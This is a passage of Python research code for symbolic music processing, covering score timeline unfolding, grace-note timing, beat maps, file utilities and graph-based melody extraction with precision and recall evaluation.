are copied along, so these ID's will not be unique (but the
duplicate ID's may be useful to identify which objects are
duplicates of which).
Returns
-------
tl : TimeLine object
A TimeLine object containing the unfolded timepoints
"""
self.test_timeline()
new_timeline = []
ending_objects_tmp = defaultdict(list)
def add_points_between(start, end, offset, prev_ending_objects,
object_map, include_end=False):
# print('add_points_between',start.t, end.t, offset, include_end)
end_operator = operator.le if include_end else operator.lt
point_idx = np.logical_and(
operator.ge(self.timeline.points, start),
end_operator(self.timeline.points, end))
# make a copy of all timepoints in the selected range
new_points = np.array([copy(x)
for x in self.timeline.points[point_idx]])
for i, tp in enumerate(new_points):
# let the range start at offset
tp.t = tp.t - start.t + offset
# make a copy of all starting objects, for the new
# objects, set the start attribute to the new
# timepoint, and set the new objects to be the
# starting objects of the new timepoint
new_starting = defaultdict(list)
for k, objects in tp.starting_objects.items():
new_objects = [copy(o) for o in objects]
for o in new_objects:
o.start = tp
object_map.update(zip(objects, new_objects))
new_starting[k] = new_objects
tp.starting_objects = new_starting
if i > 0:
new_ending = defaultdict(list)
for k, objects in tp.ending_objects.items():
new_objects = [object_map[o]
for o in objects]
for o in new_objects:
o.end = tp
new_ending[k] = new_objects
tp.ending_objects = new_ending
if len(new_points) > 0:
# print('setting ending objects from last repeat:')
# print(new_points[0].t)
new_points[0].ending_objects = prev_ending_objects
for k, oo in prev_ending_objects.items():
for o in oo:
o.end = new_points[0]
ending_objects_copy = defaultdict(list)
for k, oo in end.ending_objects.items():
ending_objects_copy[k] = [object_map[o] for o in oo]
return new_points, ending_objects_copy, object_map
o_map = {}
segments = self._make_repeat_structure()
N = len(segments)
for i, (start, end, offset) in enumerate(segments):
include_end = i == N - 1
new_points, ending_objects_tmp, o_map = \
add_points_between(
start, end, offset, ending_objects_tmp, o_map, include_end)
new_timeline.append(new_points)
# for new_points in new_timeline:
# for i,p in enumerate(new_points):
# for n in p.get_starting_objects_of_type(Note):
# if n.duration > 130:
# print(i, len(new_points))
# print(n)
# print('',n)
# assert 1 == 0
new_timeline = np.concatenate(new_timeline)
for i in range(1, len(new_timeline)):
new_timeline[i - 1].next = new_timeline[i]
new_timeline[i].prev = new_timeline[i - 1]
new_timeline[0].prev = None
new_timeline[-1].next = None
# assert np.all(np.diff(np.array([tp.t for tp in new_timeline])) > 0)
tl = TimeLine()
tl.points = new_timeline
# for tp in tl.points:
# print(tp)
# for n in tp.get_starting_objects_of_type(Note):
# print(n.start.t, tp.t, n.end.t)
# assert n.start.t <= n.end.t
return tl
def remove_grace_notes(self):
for point in self.timeline.points:
point.starting_objects[Note] = [n for n in point.starting_objects[Note]
if n.grace_type is None]
point.ending_objects[Note] = [n for n in point.ending_objects[Note]
if n.grace_type is None]
def expand_grace_notes(self, default_type='appoggiatura', min_steal=.05, max_steal=.7):
"""
Expand durations of grace notes according to their
specifications, or according to the default settings specified
using the keywords. The onsets/offsets of the grace notes and
surrounding notes are set accordingly. Multiple contiguous
grace notes inside a voice are expanded sequentially.
This function modifies the `points` attribute.
Parameters
----------
default_type : str, optional. Default: 'appoggiatura'
the type of grace note, if no type is specified. Possibilites
are: {'appoggiatura', 'acciaccatura'}.
min_steal : float, optional
the min steal proportion if no proportion is specified
max_steal : float, optional
the max steal proportion if no proportion is specified
"""
assert default_type in (u'appoggiatura', u'acciaccatura')
assert 0 < min_steal <= max_steal
assert min_steal <= max_steal < 1.0
def n_notes_to_steal(n_notes):
return min_steal + (max_steal - min_steal) * 2 * (1 / (1 + np.exp(- n_notes + 1)) - .5)
# def shorten_main_notes_by(dur_prop, notes, group_id):
# # start and duration of the main note
# old_start = notes[0].start
# n_dur = np.min([n.duration for n in notes])
# new_start_t = old_start.t + n_dur * dur_prop
# print(n_dur * dur_prop)
# for i, n in enumerate(notes):
# old_start.starting_objects[Note].remove(n)
# self.timeline.add_starting_object(new_start_t, n)
# n.appoggiatura_group_id = group_id
# n.appoggiatura_duration = dur_prop
# return new_start_t
def shorten_main_notes_by(offset, notes, group_id):
# start and duration of the main note
old_start = notes[0].start
n_dur = np.min([n.duration for n in notes])
# print('app', n_dur, offset)
offset = min(n_dur * .5, offset)
new_start_t = old_start.t + offset
for i, n in enumerate(notes):
old_start.starting_objects[Note].remove(n)
self.timeline.add_starting_object(new_start_t, n)
n.appoggiatura_group_id = group_id
n.appoggiatura_duration = offset / float(n_dur)
return new_start_t
# def shorten_prev_notes_by(dur_prop, notes, group_id):
# old_end = notes[0].end
# n_dur = notes[0].duration
# new_end_t = old_end.t - n_dur * dur_prop
# for n in notes:
# old_end.ending_objects[Note].remove(n)
# self.timeline.add_ending_object(new_end_t, n)
# n.acciaccatura_group_id = group_id
# n.acciaccatura_duration = dur_prop
# return new_end_t
def shorten_prev_notes_by(offset, notes, group_id):
old_end = notes[0].end
n_dur = notes[0].duration
#print('acc', n_dur, offset)
offset = min(n_dur * .5, offset)
new_end_t = old_end.t - offset
for n in notes:
old_end.ending_objects[Note].remove(n)
self.timeline.add_ending_object(new_end_t, n)
n.acciaccatura_group_id = group_id
n.acciaccatura_duration = offset / float(n_dur)
return new_end_t
def set_acciaccatura_times(notes, start_t, group_id):
N = len(notes)
end_t = notes[0].start.t
times = np.linspace(start_t, end_t, N + 1, endpoint=True)
for i, n in enumerate(notes):
n.start.starting_objects[Note].remove(n)
self.timeline.add_starting_object(times[i], n)
n.end.ending_objects[Note].remove(n)
self.timeline.add_ending_object(times[i + 1], n)
n.acciaccatura_group_id = group_id
n.acciaccatura_idx = i
n.acciaccatura_size = N
def set_appoggiatura_times(notes, end_t, group_id):
N = len(notes)
start_t = notes[0].start.t
times = np.linspace(start_t, end_t, N + 1, endpoint=True)
for i, n in enumerate(notes):
n.start.starting_objects[Note].remove(n)
self.timeline.add_starting_object(times[i], n)
n.end.ending_objects[Note].remove(n)
self.timeline.add_ending_object(times[i + 1], n)
n.appoggiatura_group_id = group_id
n.appoggiatura_idx = i
n.appoggiatura_size = N
self.timeline.unlock()
grace_notes = [n for n in self.notes if n.grace_type is not None]
time_grouped_gns = partition(
operator.attrgetter('start.t'), grace_notes)
times = sorted(time_grouped_gns.keys())
group_counter = 0
for t in times:
voice_grouped_gns = partition(operator.attrgetter('voice'),
time_grouped_gns[t])
# print(t)
for voice, gn_group in voice_grouped_gns.items():
# print(' voice {}'.format(voice))
for n in gn_group:
if n.grace_type == 'grace':
n.grace_type = default_type
type_grouped_gns = partition(operator.attrgetter('grace_type'),
gn_group)
for gtype, type_group in type_grouped_gns.items():
total_steal_old = n_notes_to_steal(len(type_group))
total_steal = np.sum([n.duration_from_symbolic for n
in type_group])
# print("n_notes, old, new", len(type_group), total_steal_old, total_steal)
# print(' {}: {} {:.3f}'.format(gtype, len(type_group),
# total_steal))
main_notes = [m for m in type_group[0].simultaneous_notes_in_voice
if m.grace_type is None]
# multip
if len(main_notes) > 0:
# total_steal =
total_steal = min(main_notes[0].duration / 2., total_steal)
if gtype == 'appoggiatura':
# main_notes = [m for m in type_group[0].simultaneous_notes_in_voice
# if m.grace_type is None]
# print(total_steal, len(type_group))
total_steal = np.sum([n.duration_from_symbolic for n
in type_group])
# if len(main_notes) == 0:
# main_notes = [m for m in type_group[0].next_notes_in_voice
# if m.grace_type is None]
# print(' main: {}'.format(len(main_notes)))
if len(main_notes) > 0:
new_onset = shorten_main_notes_by(
total_steal, main_notes, group_counter)
set_appoggiatura_times(
type_group, new_onset, group_counter)
group_counter += 1
elif gtype == 'acciaccatura':
prev_notes = [m for m in type_group[0].previous_notes_in_voice
if m.grace_type is None]
# print(' prev: {}'.format(len(prev_notes)))
if len(prev_notes) > 0:
new_offset = shorten_prev_notes_by(
total_steal, prev_notes, group_counter)
set_acciaccatura_times(
type_group, new_offset, group_counter)
group_counter += 1
self.timeline.link()
self.timeline.lock()
def pprint(self, l=0):
pre = u' ' * l
s = [u'{}{} ({})'.format(pre, self.part_name, self.part_id)]
bm = self.beat_map
for tp in self.timeline.points:
#s.append(pre + tp.__unicode__() + u'(beat: {0})'.format(bm(tp.t)))
s.append(u'{}{}(beat: {})'.format(pre, tp, bm(tp.t)[0]))
for cls, objects in tp.starting_objects.items():
if len(objects) > 0:
#s.append(pre + u' {0}'.format(cls.__name__))
s.append(u'{} {}'.format(pre, cls.__name__))
for o in objects:
#s.append(pre + u' {0}'.format(o))
s.append(u'{} {}'.format(pre, o))
s.append(u' Stop')
for cls, objects in tp.ending_objects.items():
if len(objects) > 0:
#s.append(pre + u' {0}'.format(cls.__name__))
s.append(u'{} {}'.format(pre, cls.__name__))
for o in objects:
#s.append(pre + u' {0}'.format(o))
s.append(u'{} {}'.format(pre, o))
return u'\n'.join(s)
def _get_beat_map(self, quarter=False, default_div=1, default_den=4):
"""
This returns an interpolator that will accept as input timestamps
in divisions and returns these timestamps' beatnumbers. If the flag
`quarter` is used, these beatnumbers will refer to quarter note steps.
Parameters
----------
quarter : boolean, optional. Default: False
Returns
-------
scipy interpolate interp1d object
"""
if len(self.timeline.points) == 0:
return None
try:
first_measure = self.timeline.points[
0].get_starting_objects_of_type(Measure)[0]
if first_measure.upbeat:
offset = -first_measure.get_measure_duration(quarter=quarter)
else:
offset = 0
except IndexError:
offset = 0
divs = np.array(
[(x.start.t, x.divs) for x in
self.timeline.get_all_of_type(Divisions)], dtype=np.int)
dens = np.array(
[(x.start.t, np.log2(x.beat_type)) for x in
self.timeline.get_all_of_type(TimeSignature)], dtype=np.int)
if divs.shape[0] == 0:
LOGGER.warning(("No Divisions found in ScorePart, "
"assuming divisions = {0}").format(default_div))
divs = np.array(((0, default_div),), dtype=np.int)
if dens.shape[0] == 0:
LOGGER.warning(("No TimeSignature found in ScorePart, "
"assuming denominator = {0}").format(default_den))
dens = np.array(((0, np.log2(default_den)),), dtype=np.int)
# remove lines unnecessary for linear interpolation
didx = np.r_[0, np.where(np.diff(divs[:, 1]) != 0)[0] + 1]
divs = divs[didx]
# remove lines unnecessary for linear interpolation
didx = np.r_[0, np.where(np.diff(dens[:, 1]) != 0)[0] + 1]
dens = dens[didx]
start = self.timeline.points[0].t
end = self.timeline.points[-1].t
if divs[-1, 0] < end:
divs = np.vstack((divs, (end, divs[-1, 1])))
if dens[-1, 0] < end:
dens = np.vstack((dens, (end, dens[-1, 1])))
if divs[0, 0] > start:
divs = np.vstack(((start, divs[0, 1]), divs))
if dens[0, 0] > start:
dens = np.vstack(((start, dens[0, 1]), dens))
if quarter:
dens[:, 1] = 1
# integrate second column, where first column is time:
# new_divs = np.cumsum(np.diff(divs[:, 0]) * divs[:-1, 1])
new_divs = divide_outside_cumsum(divs)
divs = divs.astype(np.float)
divs[1:, 1] = new_divs
divs[0, 1] = divs[0, 0]
# at this point divs[:, 0] is a list of musicxml div times
# and divs[:, 1] is a list of corresponding quarter note times
# interpolation object to map div times to quarter times:
# div_intp = my_interp1d(divs[:, 0], divs[:, 1])
div_intp = interp1d(divs[:, 0], divs[:, 1])
dens = dens.astype(np.float)
# change dens[:, 0] from div to quarter times
dens[:, 0] = div_intp(dens[:, 0])
# change dens[:, 1] back from log2(beat_type) to beat_type and divide by
# 4; Here take the reciprocal (4 / 2**dens[:, 1]) since in divid_outside_cumsum we will be
# dividing rather than multiplying:
dens[:, 1] = 4 / 2**dens[:, 1]
# dens_new = np.cumsum(np.diff(dens[:, 0]) * dens[:-1, 1])
dens_new = divide_outside_cumsum(dens)
dens[1:, 1] = dens_new
dens[0, 1] = dens[0, 0]
den_intp = interp1d(dens[:, 0], dens[:, 1])
if len(self.timeline.points) < 2:
return lambda x: np.zeros(len(x))
else:
def f(x):
try:
# divi = div_intp(x)
# deni = den_intp(divi) + offset
# np.savetxt('/tmp/bm.txt', np.column_stack((x, divi, deni)), fmt="%.3f")
# np.savetxt('/tmp/den.txt', dens, fmt="%.3f")
# return deni
return den_intp(div_intp(x)) + offset
except ValueError:
print(np.min(x),np.max(x))
raise
return f
def _get_notes(self, unfolded=False):
"""
return all note objects of the score part.
Parameters
----------
unfolded : boolean, optional. Default: False
whether to unfolded the timeline or not.
Returns
-------
notes : list of Note objects
"""
notes = []
if unfolded:
tl = self.unfold_timeline()
else:
tl = self.timeline
for tp in tl.points:
notes.extend(tp.get_starting_objects_of_type(Note) or [])
return notes
def get_loudness_directions(self):
"""
return all loudness directions
"""
return self.timeline.get_all_of_type(LoudnessDirection, include_subclasses=True)
# directions = []
# for tp in self.timeline.points:
# directions.extend(
# tp.get_starting_objects_of_type(DynamicLoudnessDirection) or [])
# directions.extend(
# tp.get_starting_objects_of_type(ConstantLoudnessDirection) or [])
# directions.extend(
# tp.get_starting_objects_of_type(ImpulsiveLoudnessDirection) or [])
# return directions
def get_tempo_directions(self):
"""
return all tempo directions
"""
return self.timeline.get_all_of_type(TempoDirection, include_subclasses=True)
# directions = []
# for tp in self.timeline.points:
# directions.extend(
# tp.get_starting_objects_of_type(DynamicTempoDirection) or [])
# directions.extend(
# tp.get_starting_objects_of_type(ConstantTempoDirection) or [])
# return directions
# @property
@cached_property
def notes(self):
"""
all note objects
"""
return self._get_notes()
@cached_property
def notes_unfolded(self):
"""
all note objects, with unfolded timeline.
"""
return self._get_notes(unfolded=True)
#@cached_property
@property
def beat_map(self):
"""
map timeline times to beat times
"""
return self._get_beat_map()
#@cached_property
@property
def quarter_map(self):
"""
map timeline times to beat times
"""
return self._get_beat_map(quarter=True)
```
#### File: extra/tests/test_matchfile.py
```python
import argparse
import numpy as np
from data_handling import matchfile
from data_handling.sparse_feature_extraction import score2spr
from data_handling.sparse_datafiles import csr_to_file
def summarize_match_file(m):
"""
Display some information from a Match file
:param m: a MatchFile object
"""
# print header info
for line in m.info():
print(u' {0}\t{1}'.format(line.Attribute,line.Value).expandtabs(20))
# print time sig info
print('Time signatures:')
for t, (n, d) in m.time_signatures:
print(' {0}/{1} at beat {2}'.format(n, d, t))
def get_notes_from_match(m):
notes = np.array([(sn.OnsetInBeats, sn.OffsetInBeats, sn.MidiPitch[0])
for sn, n in m.note_pairs], np.float)
lowest = 30
highest = 100
beat_div = 8
neighbour_beats = 2
onset_only = True
A, _ = score2spr(notes, onset_only, lowest, highest, beat_div, neighbour_beats)
outfile = '/tmp/sparse.npz'
print('saving sparse matrix to {0}'.format(outfile))
csr_to_file(outfile, A)
def main():
"""
Illustrate some functionality of the match module
"""
parser = argparse.ArgumentParser("Get information from a Matchfile file")
parser.add_argument("file", help="Match file")
args = parser.parse_args()
m = matchfile.MatchFile(args.file)
#summarize_match_file(m)
get_notes_from_match(m)
if __name__ == '__main__':
main()
```
#### File: extra/utils/os_utils.py
```python
import subprocess
import sys
import tty
import termios
import os
import re
from collections import defaultdict
import signal
import logging
from functools import wraps
import cPickle
import bz2
import gzip
from cPickle import UnpicklingError
LOGGER = logging.getLogger(__name__)
def load_pyc_bz(fn):
return cPickle.load(bz2.BZ2File(fn, 'r'))
def save_pyc_bz(d, fn):
cPickle.dump(d, bz2.BZ2File(fn, 'w'), cPickle.HIGHEST_PROTOCOL)
def load_pyc_gz(fn):
return cPickle.load(gzip.GzipFile(fn, 'r'))
def save_pyc_gz(d, fn):
cPickle.dump(d, gzip.GzipFile(fn, 'w'), cPickle.HIGHEST_PROTOCOL)
def get_from_cache_or_compute(cache_fn, func, args=(), kwargs={}, refresh_cache=False):
"""
If `cache_fn` exists, return the unpickled contents of that file
(the cache file is treated as a bzipped pickle file). If this
fails, compute `func`(*`args`), pickle the result to `cache_fn`,
and return the result.
Parameters
----------
func : function
function to compute
args : tuple
argument for which to evaluate `func`
cache_fn : str
file name to load the computed value `func`(*`args`) from
refresh_cache : boolean
if True, ignore the cache file, compute function, and store the result in the cache file
Returns
-------
object
the result of `func`(*`args`)
"""
result = None
if cache_fn is not None and os.path.exists(cache_fn):
if refresh_cache:
os.remove(cache_fn)
else:
try:
result = load_pyc_bz(cache_fn)
except UnpicklingError as e:
LOGGER.error(('The file {0} exists, but cannot be unpickled. Is it readable? Is this a pickle file?'
'').format(cache_fn))
raise e
if result is None:
result = func(*args, **kwargs)
if cache_fn is not None:
save_pyc_bz(result, cache_fn)
return result
def debug_mode(logger):
"""
Return True when logger is in DEBUG mode, False otherwise.
:param logger: a Logger instance from the logging module
:return: True or False
"""
return logger.getEffectiveLevel() == logging.DEBUG
def init_worker():
"""
Setup a worker to ignore signals
"""
signal.signal(signal.SIGINT, signal.SIG_IGN)
# class KeyboardInterruptError(Exception): pass
# this approach doesn't really work
# since decorated functions can't be pickled
def catch_KeyboardInterrupt(fun):
def wrapper(*args, **kwargs):
try:
return fun(*args, **kwargs)
except KeyboardInterrupt:
raise KeyboardInterruptError()
return wrapper
class Result(object):
"""
A drop-in replacement for the Result object returned by
asynchronous multiprocessing calls
"""
def __init__(self, v):
self.v = v
def get(self):
return self.v
class FakePool(object):
"""
A drop-in replacement for multiprocessing.Pool that
carries out jobs sequentially (useful for debugging).
"""
def __init__(self, *args):
pass
def map(self, f, a):
return map(f, a)
def apply_async(self, f, args=(), kwargs={}, callback=None):
if callback:
callback(f(*args, **kwargs))
else:
return Result(f(*args, **kwargs))
def close(self):
pass
def terminate(self):
pass
def join(self):
pass
class PoolWrapper(object):
"""
Class that can be
Parameters
----------
x : type
Description of parameter `x`.
Returns
-------
int
Description of return value
"""
def __init__(self, target):
self.target = target
try:
functools.update_wrapper(self, target)
except:
pass
def __call__(self, args):
try:
return self.target(*args)
except KeyboardInterrupt:
print('child interrupted')
return None
def pair_files(dir_dict, remove_incomplete=True):
"""
Pair files in directories;
dir_dict is of form (label: directory)
"""
result = defaultdict(dict)
for label, directory in dir_dict.items():
for f in os.listdir(directory):
name = os.path.splitext(f)[0]
result[name][label] = f
if remove_incomplete:
labels = dir_dict.keys()
for k in result.keys():
if not all([y in result[k] for y in labels]):
del result[k]
return result
def pair_files_new(dir_dict, remove_incomplete=True,
split=False, remove_parts=set()):
"""
Pair files in directories;
dir_dict is of form (label: directory)
"""
result = defaultdict(dict)
if split:
pat = re.compile(split)
for label, directory in dir_dict.items():
for f in os.listdir(directory):
name = os.path.splitext(f)[0]
if split:
key = tuple([x for i, x in enumerate(pat.split(name))
if not i in remove_parts])
else:
key = name
result[key][label] = f
if remove_incomplete:
labels = dir_dict.keys()
for k in result.keys():
if not all([y in result[k] for y in labels]):
del result[k]
return result
def get_output_from_command(cmd):
"""Simple wrapper around popen2, to get output from a shell command"""
p = subprocess.Popen(cmd, shell=True, stdin=subprocess.PIPE,
stdout=subprocess.PIPE, close_fds=True)
p.stdin.close()
result = p.stdout.readlines()
p.stdout.close()
return result
class _Getch:
"""
Get a single character from standard input;
Do not echo to the screen
"""
def __init__(self, enc=False):
try:
self.impl = _GetchUnix(enc)
except ImportError:
self.impl = _GetchWindows(enc)
def __call__(self):
return self.impl()
class _GetchUnix:
def __init__(self, enc=False):
self.enc = enc
if self.enc:
import codecs
import locale
# Wrap stdin with an encoding-aware reader.
_, encoding = locale.getdefaultlocale()
encoding = encoding or 'utf8'
self.stdin = codecs.getreader(encoding)(sys.stdin)
else:
self.stdin = sys.stdin
def __call__(self):
# import sys, tty, termios
fd = self.stdin.fileno()
old_settings = termios.tcgetattr(fd)
try:
tty.setraw(sys.stdin.fileno())
ch = self.stdin.read(1)
finally:
termios.tcsetattr(fd, termios.TCSADRAIN, old_settings)
return ch
class _GetchWindows:
def __init__(self, enc=False):
import msvcrt
def __call__(self):
import msvcrt
return msvcrt.getch()
get_character = _Getch()
get_character_enc = _Getch(enc=True)
def interrupt_decorator(f):
@wraps(f)
def wrapper(*args, **kwargs):
try:
return f(*args, **kwargs)
except KeyboardInterrupt:
print('\nfunction {0}.{1} was configured to intercept '
'KeyboardInterrupts. Press "a" to abort, or any other '
'key to continue.'
.format(f.__module__, f.__name__))
x = get_character()
if x == 'a':
raise KeyboardInterrupt
else:
return None
return wrapper
if __name__ == '__main__':
pass
```
#### File: Symbolic-Melody-Identification/melody_extractor/graph_tools.py
```python
import time
import math
import numpy as np
import sklearn.metrics
from scipy.sparse import csgraph
from sklearn.model_selection import train_test_split
import misc_tools
import settings
try:
import cPickle as pickle
except Exception:
import pickle
FINAL_VALUE = -0.5
def compute_prob(note, prob_map, THRESHOLD):
"""
compute the probability of *note* referred to *prob_map*.
If the probability is higher than *THRESHOLD*, than the cost will
be > 0, otherwise it will be 0.
"""
pitch, onset, offset, ismelody = note
m = prob_map[pitch, onset: offset]
if m.shape[0] > 2 and settings.OUTLIERS_ON_PROB:
m = m[modified_z_score(m)]
if settings.AVERAGE:
p = m.mean()
else:
p = np.median(m)
if p < THRESHOLD:
return -0.5
else:
return p
def build_graph_matrix(notelist, prob_map, THRESHOLD):
"""
Returns a 2D array containing the matrix relative to the branch costs
in the graph. For each note A in *notelist*, it creates branches to the
notes N_i so that:
1) onset(N_k) == onset(N_l) for each k, l
2) onset(N_i) == min{onset(Y)} where Y: onset(Y) > offset(A), cost(Y) =
1 - probability(Y) <= *THRESHOLD*} for each i
This also adds two new virtual notes representing the first and the last
note.
"""
out = np.full((len(notelist) + 2, len(notelist) + 2),
np.inf,
dtype=settings.floatX)
last_onset = notelist[0][0]
# initialize the starting virtual note
FOUND_NEXT_NOTE = False
for i, note_i in enumerate(notelist, start=1):
pitch_i, onset_i, offset_i, melody_i = note_i
if onset_i > last_onset and FOUND_NEXT_NOTE:
# we have found a note in the previous onset
break
cost_i = -compute_prob(note_i, prob_map, THRESHOLD)
if cost_i > 0:
continue
else:
FOUND_NEXT_NOTE = True
out[0, i] = cost_i
last_onset = onset_i
for i, note_i in enumerate(notelist):
pitch_i, onset_i, offset_i, melody_i = note_i
FOUND_NEXT_NOTE = False
for j, note_j in enumerate(notelist[i + 1:], start=1):
pitch_j, onset_j, offset_j, melody_j = note_j
if onset_j < offset_i:
continue
elif FOUND_NEXT_NOTE and notelist[i + j - 1][0] < onset_j:
break
cost_j = -compute_prob(note_j, prob_map, THRESHOLD)
if cost_j > 0:
continue
else:
FOUND_NEXT_NOTE = True
# i + 1 because we have added a virtual note
out[(i + 1), (i + 1) + j] = cost_j
last_onset = onset_j # this is the last note reachable
if not FOUND_NEXT_NOTE:
# let's jump to the last virtual state
out[(i + 1), -1] = FINAL_VALUE
# making the last notes pointing to the ending virtual note
# is this required??
for i, note_i in enumerate(reversed(notelist), start=2):
if note_i[1] < last_onset:
break
elif note_i[1] > last_onset:
continue
else:
out[-i, -1] = FINAL_VALUE
return out
def _check(notelist, pianoroll_prob):
"""
Just for debugging
"""
WIN_WIDTH = int(settings.ARG_DEFAULT['win_w'])
EPS = misc_tools.EPS(0)
for j, (onset, offset, pitch) in enumerate(notelist):
flag = False
if pianoroll_prob[pitch, onset] < EPS:
for i in range(WIN_WIDTH):
if pianoroll_prob[pitch, onset - i] >= EPS:
print("you're wrong of -" + str(i) +
" for onset of note " + str(j))
flag = True
break
if pianoroll_prob[pitch, onset + i] >= EPS:
print("you're wrong of +" + str(i) +
" for onset of note " + str(j))
flag = True
break
elif pianoroll_prob[pitch, offset - 1] < EPS:
for i in range(WIN_WIDTH):
if pianoroll_prob[pitch, offset - 1 - i] >= EPS:
print("you're wrong of -" + str(i) +
" for offset of note " + str(j))
flag = True
break
if pianoroll_prob[pitch, offset - 1 + i] >= EPS:
print("you're wrong of +" + str(i) +
" for offset of note " + str(j))
flag = True
break
else:
for i in range(onset, offset):
if pianoroll_prob[pitch, i] < EPS:
print("note " + str(j) + " has some internal values set to 0")
flag = True
break
if flag:
return 1
# if not flag:
# print("note " + str(j) + " is correct")
return 0
def modified_z_score(ys):
"""
PARAMETERS :
------------
list-like object, usually 1D np.array
RETURN :
--------
a new 1D np.array containing the indices of elements not ouliers
stolen from http://colingorrie.github.io/outlier-detection.html
"""
threshold = 3.5
median_y = np.median(ys)
median_absolute_deviation_y = np.median([np.abs(y - median_y) for y in ys])
modified_z_scores = [0.6745 * (y - median_y) / median_absolute_deviation_y
for y in ys]
return np.where(np.abs(modified_z_scores) < threshold)[0]
def iqr(ys):
"""
PARAMETERS :
------------
list-like object, usually 1D np.array
RETURN :
--------
a new 1D np.array containing the indices of elements not ouliers
stolen from http://colingorrie.github.io/outlier-detection.html
"""
quartile_1, quartile_3 = np.percentile(ys, [25, 75])
iqr = quartile_3 - quartile_1
lower_bound = quartile_1 - (iqr * 1.5)
upper_bound = quartile_3 + (iqr * 1.5)
return np.where((ys < upper_bound) | (ys > lower_bound))[0]
def set_threshold(arr, CLUSTERING='single'):
print("starting clustering")
arr = arr.reshape(-1)
arr = arr[arr > settings.MIN_TH]
N_CLUSTER = 2
target_cluster = 1
print("max, min: ", arr.max(), arr.min())
arr = arr[iqr(arr)]
if CLUSTERING == 'kmeans':
from sklearn.cluster import KMeans
kmeans = KMeans(n_clusters=N_CLUSTER,
init=np.array([settings.MIN_TH, arr.max()]).reshape(-1, 1))
labels = kmeans.fit_predict(arr.reshape(-1, 1))
else:
import fastcluster
from scipy.cluster.hierarchy import fcluster
from scipy.spatial.distance import pdist
Z = pdist(arr.reshape(-1, 1))
if CLUSTERING == 'single':
X = fastcluster.single(Z)
elif CLUSTERING == 'average':
X = fastcluster.average(Z)
elif CLUSTERING == 'centroid':
X = fastcluster.centroid(Z)
else:
return settings.THRESHOLD
labels = N_CLUSTER - fcluster(X, N_CLUSTER, 'maxclust')
# setting 0 for the minimum cluster
# np.ma.masked_array returns only values where the mask is 0
index = {}
for i, l in enumerate(labels):
index[l] = arr[i]
if len(index.keys()) == N_CLUSTER:
break
index = sorted(index.items(), key=lambda kv: kv[1]) # list of tuples sorted by values
target_label = index[target_cluster - 1][0] # the label of the desired cluster
th = np.max(arr[np.flatnonzero(labels == target_label)]) # max of the down cluster
print("found threshold: " + str(th))
# print(str(np.ma.masked_array(arr, 1 - labels).min()))
return th
def polyphonic_part(notelist, pianoroll_prob, THRESHOLD):
"""
Returns a list of int: 1 if the note at that index in *notelist* has a
probability > *THRESHOLD*, 0 otherwise.
"""
predicted_labels = []
for note in notelist:
c = compute_prob(note, pianoroll_prob, THRESHOLD)
if np.isnan(c):
# don't know why this happens, we had already discarded nans...
predicted_labels.append(0)
else:
predicted_labels.append(int(math.ceil(c)))
return predicted_labels
def monophonic_part(notelist, pianoroll_prob, THRESHOLD):
"""
Compute a strictly monophonic part by using the shortest path algorithm
specified in `settings`
RETURNS :
a tuple containing :
list(int) : the predicted labels
list(int) : the melody indices
"""
# compute the graph matrix
graph = build_graph_matrix(notelist, pianoroll_prob, THRESHOLD)
# compute the minimum paths
dist_matrix, predecessors = csgraph.shortest_path(graph, method=settings.PATH_METHOD,
directed=True,
indices=[0],
return_predecessors=True)
# building the predicted array label
last = predecessors[0, -1]
predicted_labels = [0 for j in range(len(notelist) + 2)]
melody_indices = []
while last != -9999:
predicted_labels[last] = 1
melody_indices.append(last)
last = predecessors[0, last]
predicted_labels = predicted_labels[1:-1]
return predicted_labels, melody_indices
def predict_labels(pianoroll_prob, in_notelist):
"""
Compute notes in the solo part according to the input notelist
and a pianoroll probability distribution.
PARAMETERS :
pianoroll_prob : 2d np.array
the pianoroll distribution
in_notelist : 2d np.array
the input list of notes as returned by
`utils.pianoroll_utils.make_pianorolls`
RETURNS :
a tuple of 1D arrays :
true labels according to `in_notelist` (1 where there is a 'solo
part', 0 where there isn't)
predicted labels according to `in_notelist`
"""
# ordering notelist by onset:
notelist = in_notelist[in_notelist[:, 1].argsort()]
# changing all nan to 2 * EPS(0)
for i in np.nditer(pianoroll_prob, op_flags=['readwrite']):
if np.isnan(i):
i[...] = 2 * misc_tools.EPS(0)
# np.nan_to_num(pianoroll_prob, copy=False)
# looking for the first non empty column
s = pianoroll_prob.sum(axis=0).nonzero()[0]
# first column with non zero values minus first onset
pad_length = s[0] - in_notelist[0][1]
notelist = [(pitch, onset + pad_length, offset + pad_length, ismelody)
for pitch, onset, offset, ismelody in in_notelist]
# notelist has no more the ground-truth, so we are using in_notelist
true_labels = zip(*in_notelist)[-1]
THRESHOLD = settings.THRESHOLD
if settings.CLUSTERING != 'None':
THRESHOLD = set_threshold(
pianoroll_prob, CLUSTERING=settings.CLUSTERING)
if settings.MONOPHONIC:
# compute the graph matrix
predicted_labels = monophonic_part(
notelist, pianoroll_prob, THRESHOLD)[0]
else:
predicted_labels = polyphonic_part(
notelist, pianoroll_prob, THRESHOLD)
return np.array(true_labels), np.array(predicted_labels)
def test_shortest_path(test_notelists, predictions, pieces_indices=None, OUT_FILE=None):
""" This build a graph starting from *test_notelists* and *predictions* and
computes the minimum cost path through Dijkstra algortihm for DAG non-negative
weighted graphs.
It also computes Precision, Recall and F-measure for each piece in
*test_notelists * and the avarage F_measure
*test_notelists * must be an array-like of notelists as created by
*misc_tools.load_files*
RETURNS:
a tuple of three lists containing:
* fmeasures
* precisions
* recalls
computed on pieces in the notelists in input
"""
fmeasure_list = []
precision_list = []
recall_list = []
for i in range(len(test_notelists)):
pianoroll_prob = predictions[i]
in_notelist = test_notelists[i]
true_labels, predicted_labels = predict_labels(
pianoroll_prob, in_notelist)
# compute fmeasure, precision and recall:
precision = sklearn.metrics.precision_score(
true_labels, predicted_labels)
recall = sklearn.metrics.recall_score(true_labels, predicted_labels)
fmeasure = 2 * precision * recall / (precision + recall)
if np.isnan(fmeasure):
fmeasure = 0.0
if (OUT_FILE is not None) and (pieces_indices is not None):
OUT_FILE.write("\nPiece number: " + str(pieces_indices[i]))
OUT_FILE.write("\nPrecision: " + str(precision))
OUT_FILE.write("\nRecall: " + str(recall))
OUT_FILE.write("\nF1-measure: " + str(fmeasure) + "\n")
print("Piece number: " + str(pieces_indices[i]))
print("Precision: " + str(precision))
print("Recall: " + str(recall))
print("F1-measure: " + str(fmeasure))
print("")
fmeasure_list.append(fmeasure)
precision_list.append(precision)
recall_list.append(recall)
if (OUT_FILE is not None) and (pieces_indices is not None):
OUT_FILE.flush()
